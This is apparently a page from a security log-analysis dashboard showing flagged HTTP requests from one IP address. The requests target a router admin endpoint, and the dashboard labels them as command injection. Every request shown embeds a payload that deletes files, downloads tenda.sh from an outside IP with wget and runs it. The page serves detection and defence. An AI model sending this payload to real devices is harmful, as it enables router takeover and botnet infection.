Log Explorer

Fact drill-down for 80.94.92.60

Risk 100 HIGH Scope All time All-time facts 1216 In-scope 1216 Filtered 1216 Seen 2024-04-15 → 2024-05-23

Reset (all-time)

Active (none) Clear

Faceted filters (facts-based) exact core + snapshot + optional start/end

Annotation facets

HTTP facets

Snapshot facets

Custom time window (optional override)

Provide start/end to scope time explicitly (overrides days). Leave blank for all-time.

Tip: keep windows tight when you need speed, but the default is fact-complete.

Top annotators (facts, in-scope)

cmdi 668 base 426 ua 104 sfp 18

Top labels (facts, in-scope)

cmdi 668 observed 426 ua 104 sensitive_file 18

Click a pill to apply it as a filter.

Annotated access events

Showing page 1 / 25 — total 1216 rows

← Prev Next →

#1 2024-05-23 21:31:25 event 1306862 GET 404 bytes 19155

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

event observed

details

—

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#2 2024-05-23 21:31:25 event 1306862 GET 404 bytes 19155

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='e?form=country&operation=write&country=$(rm -rf *; cd /tmp; wget http://185.216.70.156/tenda.sh; chmod 777 tenda.sh; ./tenda'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#3 2024-05-23 21:31:25 event 1306862 GET 404 bytes 19155

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

Detected subshell execution syntax (`...` or $(...)). Snippet='bin/luci/;stok=/locale?form=country&operation=write&country=$(rm -rf *; cd /tmp; wget http://185.216.70.156/tenda.sh; chmod 777 tenda.sh; ./tenda.sh) -'

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:subshell

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#4 2024-05-23 21:31:23 event 1306861 GET 404 bytes 19155

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

event observed

details

—

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#5 2024-05-23 21:31:23 event 1306861 GET 404 bytes 19155

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#6 2024-05-23 21:31:23 event 1306861 GET 404 bytes 19155

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:subshell

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#7 2024-05-23 21:16:24 event 1306814 GET 404 bytes 19155

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

event observed

details

—

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#8 2024-05-23 21:16:24 event 1306814 GET 404 bytes 19155

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#9 2024-05-23 21:16:24 event 1306814 GET 404 bytes 19155

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:subshell

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#10 2024-05-23 21:16:22 event 1306813 GET 404 bytes 19155

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

event observed

details

—

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#11 2024-05-23 21:16:22 event 1306813 GET 404 bytes 19155

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#12 2024-05-23 21:16:22 event 1306813 GET 404 bytes 19155

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:subshell

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#13 2024-05-23 11:50:50 event 1305238 GET 499

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

event observed

details

—

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#14 2024-05-23 11:50:50 event 1305237 GET http —

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

—

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

—

summary

event observed

details

—

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#15 2024-05-23 11:50:50 event 1305237 GET http —

ann ua 6 label ua

Request Missing User-Agent header

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

—

Annotation facts

label

rule

ua:missing

conf

60.00

details

Request had no User-Agent value (missing/empty field).

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

—

summary

Missing User-Agent header

details

Request had no User-Agent value (missing/empty field).

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#16 2024-05-23 11:50:50 event 1305238 GET 499

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#17 2024-05-23 11:50:50 event 1305238 GET 499

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:subshell

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#18 2024-05-23 11:50:50 event 1305237 GET http —

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

—

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

—

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#19 2024-05-23 11:50:50 event 1305237 GET http —

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

—

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

—

summary

Command/file-injection indicator: cmdi:subshell

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#20 2024-05-23 11:50:49 event 1305236 GET 404 bytes 19155

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

event observed

details

—

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#21 2024-05-23 11:50:49 event 1305236 GET 404 bytes 19155

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#22 2024-05-23 11:50:49 event 1305236 GET 404 bytes 19155

ann cmdi 30 label cmdi

Request Command/file-injection indicator: cmdi:subshell

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

cmdi

rule

cmdi:subshell

conf

92.00

details

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

Command/file-injection indicator: cmdi:subshell

details

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#23 2024-05-23 10:54:50 event 1304983 GET 499

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246

summary

event observed

details

—

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#24 2024-05-23 10:54:50 event 1304982 GET http —

ann base label observed

Request event observed

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

—

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)

referer

—

summary

event observed

details

—

subnet

80.94.92.0/24

asn

47890 — UNMANAGED LTD

geo

The Netherlands, North Holland, Amsterdam

org

Techoff SRV Limited

#25 2024-05-23 10:54:50 event 1304982 GET http —

ann ua 6 label ua

Request Missing User-Agent header

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.70.156%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3…

referer

—

Annotation facts

label

rule

ua:missing

conf

60.00

details

Request had no User-Agent value (missing/empty field).

More (full fields + snapshot) expand

url

